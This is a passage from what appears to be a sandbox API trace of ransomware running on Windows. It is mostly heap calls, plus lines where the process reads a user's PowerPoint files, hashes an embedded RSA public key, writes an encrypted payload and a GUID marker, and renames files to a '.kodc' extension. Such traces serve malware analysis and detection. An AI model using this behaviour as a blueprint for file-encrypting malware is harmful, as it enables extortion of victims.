Flags=0x0, Size=0x82) returned 0x696a88 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.087] GetCurrentThreadId () returned 0x42c [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a898 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.089] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4ce4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.089] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.090] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.090] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.090] CloseHandle (hObject=0x5cc) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.091] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8zV-Lb4_.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zv-lb4_.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8zV-Lb4_.ppt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8zv-lb4_.ppt.kodc")) returned 1 [0098.092] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4513b0, ftCreationTime.dwHighDateTime=0x1d5c29e, ftLastAccessTime.dwLowDateTime=0x79af8270, ftLastAccessTime.dwHighDateTime=0x1d5ba6b, ftLastWriteTime.dwLowDateTime=0x79af8270, ftLastWriteTime.dwHighDateTime=0x1d5ba6b, nFileSizeHigh=0x0, nFileSizeLow=0x27da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ac56VePDrCIq.pptx", cAlternateFileName="AC56VE~1.PPT")) returned 1 [0098.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.092] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ac56VePDrCIq.pptx") returned=".pptx" [0098.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ac56VePDrCIq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ac56vepdrciq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.093] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=10202) returned 1 [0098.093] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.096] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x27b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.096] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.097] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x27da, lpOverlapped=0x0) returned 1 [0098.097] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.097] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.097] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.097] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.098] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.098] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.098] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.098] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.098] GetLastError () returned 0x0 [0098.098] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.098] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.098] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.099] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.099] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x27e0) returned 0x9b9b950 [0098.099] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33404a0 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a838 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33404e8 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.099] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a898 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a880 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.101] GetCurrentThreadId () returned 0x42c [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e428 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.101] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.101] GetCurrentThreadId () returned 0x42c [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.103] RtlAllocateHeap 